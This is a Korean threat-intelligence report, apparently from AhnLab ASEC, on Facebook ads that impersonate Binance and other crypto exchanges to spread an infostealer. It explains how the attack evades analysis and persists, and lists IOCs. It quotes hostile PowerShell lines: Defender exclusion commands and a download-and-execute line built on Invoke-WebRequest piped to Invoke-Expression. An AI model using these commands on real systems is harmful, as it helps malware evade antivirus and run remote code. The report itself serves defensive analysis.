암호화폐 거래소로 위장한 페이스북 광고에 의한 악성코드 유포

AhnLab SEcurity intelligence Center(ASEC)은 암호화폐 사용자를 대상으로 페이스북 광고를 통해 유포되는 악성코드를 확인했다. 해당 악성코드는 특정 암호화폐 거래소로 위장하여 악성 프로그램 설치를 유도하며 사용자가 위장된 웹사이트에서 파일을 다운로드하면 “installer.msi”라는 이름의 파일이 저장되며, 설치가 진행된다. 설치 과정에서 위장된 웹사이트에 로드된 JavaScript와 통신을 수행하게 되며, 최종적으로 시스템 정보, 화면 캡처, 브라우저 정보 등을 수집하는 인포스틸러가 실행된다.

 

[그림 1] 가짜 광고들

 

본문에서는 바이낸스를 위장한 사이트를 기준으로 설명한다. 사용자가 페이스북 광고 내 “더 알아보기” 또는 “다운로드” 버튼을 클릭할 경우, 위장된 웹사이트로 리다이렉션된다. 단, 사용자가 페이스북에 로그인하지 않았거나 URL에 “utm_campaign, utm_content, cid, bid, fbclid, fbid” 등의 파라미터가 포함되지 않은 경우에는 광고와 무관한 일반 사이트로 리다이렉션된다. 조건을 만족하여 위장 사이트로 이동한 경우, 메인 화면에서 Windows용 다운로드 버튼을 통해 악성 파일 다운로드를 유도한다.

 

[그림 2] 바이낸스를 위장한 사이트

 

사용자가 해당 버튼을 클릭하면 “installer.msi”라는 이름의 파일이 다운로드되며, 이를 설치하는 과정에서 로컬 호스트의 특정 포트(30303)이 리스닝 상태로 열리고, 이후 위장된 웹사이트가 해당 포트를 통해 시스템과의 연결을 시도하여 통신을 주고받기 시작한다. 파라미터에 따라 명령을 수행하며 파라미터 별 기능은 아래 [표 1]과 같다. 

 

파라미터	기능
/file	installer.msi 이름으로 파일 다운로드
/r	특정 레지스트리에서 GUID 조회
/w	WMI 쿼리문을 이용해 시스템 정보 조회
/worker	XML 형태의 스케줄러 응답

[표 1] 파라미터 별 기능 

 

[그림 3] 위장 사이트에 로드된 JavaScript 코드 일부

 

 

“/r” 파라미터를 통해 피해 시스템의 GUID를 공격자 서버로 전송하면, 서버는 시스템 정보를 조회하는 WMI 쿼리를 응답한다. 피해자의 PC는 이 응답을 받아 WMI 쿼리를 이용해 시스템 정보를 수집하고, “/worker” 파라미터를 사용하여 이를 다시 공격자 서버로 전송한다. 이후 피해 시스템이 가상 환경일 경우 서버는 NULL 값을 반환하며 통신은 종료된다. 반면, 가상 환경이 아닐 경우 파워쉘 스케줄러를 실행하는 XML 형식의 스케줄러 파일을 응답한다.

 

[그림 4] (상) 스케줄러 응답이 없을 때(가상환경) (하) 스케줄러 응답이 있을 때(가상환경 아닌 경우)

 

 

스케줄러가 등록되면, “Application(응용 프로그램)” 로그에서 이벤트가 발생할 경우 BASE64로인코딩된 파워쉘 스크립트를 실행하며 실행되는 스크립트에 대한 자세한 내용은 아래와 같다.

 

번호	스크립트	기능
1	Add-MpPreference -ExclusionProcess (Get-Process -PID $PID).MainModule.ModuleName -Force	파워쉘 프로세스를 Windows Defender 검사 예외로 추가
2	Add-MpPreference -ExclusionPath (Get-Location) -Force	파워쉘이 실행하는 스크립트 경로를 Windows Defender 검사 예외로 추가
3	Invoke-WebRequest -UseBasicParsing 도메인?OSSoftwareInstallerLegacy | Invoke-Expression	특정 도메인에서 추가 스크립트 다운로드 및 실행
4	Invoke-WebRequest -UseBasicParsing 도메인?OSSoftwareInstallerLegacy | Invoke-Expression	특정 도메인에서 추가 스크립트 다운로드 및 실행

[표 2] 스크립트 별 기능

 

 

[그림 5] 등록된 스케줄러

 

 

[표 2]의 3번 또는 4번에 해당하는 스크립트가 실행되면, 외부에서 추가 파워쉘 스크립트를 다운로드 및 실행한다. 다운로드된 스크립트는 아래 [그림 6]과 같이 또 다시 외부에서 추가 스크립트를 다운로드 및 실행한다. 

[그림 6] 추가 스크립트를 다운로드하는 파워쉘 스크립트

 

 

해당 공격은 암호화폐에 관심 있는 사용자를 대상으로 광고를 통해 유포된다. 해외 보안 업체인 Bitdefender, WithSecure에서도 관련 내용을 공개한 바 있다. 최종적으로 실행되는 악성코드는 브라우저 정보, 텔레그램 정보 등을 수집하며, 키로깅 등 다양한 악성 행위를 수행한다고 알려져 있다. 사용자는 파일 다운로드 시 도메인 주소를 확인해 공식 홈페이지인지 유의해야 하며, 광고를 통해 유포되는 파일은 대부분 원치 않는 PUP성 프로그램이거나 악성코드일 가능성이 높으므로 다운로드는 지양해야 한다.

MD5

02c88f8b926d91ac248276fa629b75c2

07997692c2129a707adb0d5b0b342aad

07d5aad458d9de54efcc5f6319e64812

0821bbede515892ca798153bb5a81ccb

083e31296cf8a2c6a23baf34e0e8b305

FQDN

5[.]firewall-813[.]com

binance-downloaad[.]com

binance-tv[.]app-desktop-pc[.]com

binance[.]desktop-windows-pc[.]com

binance[.]pc-download-application[.]com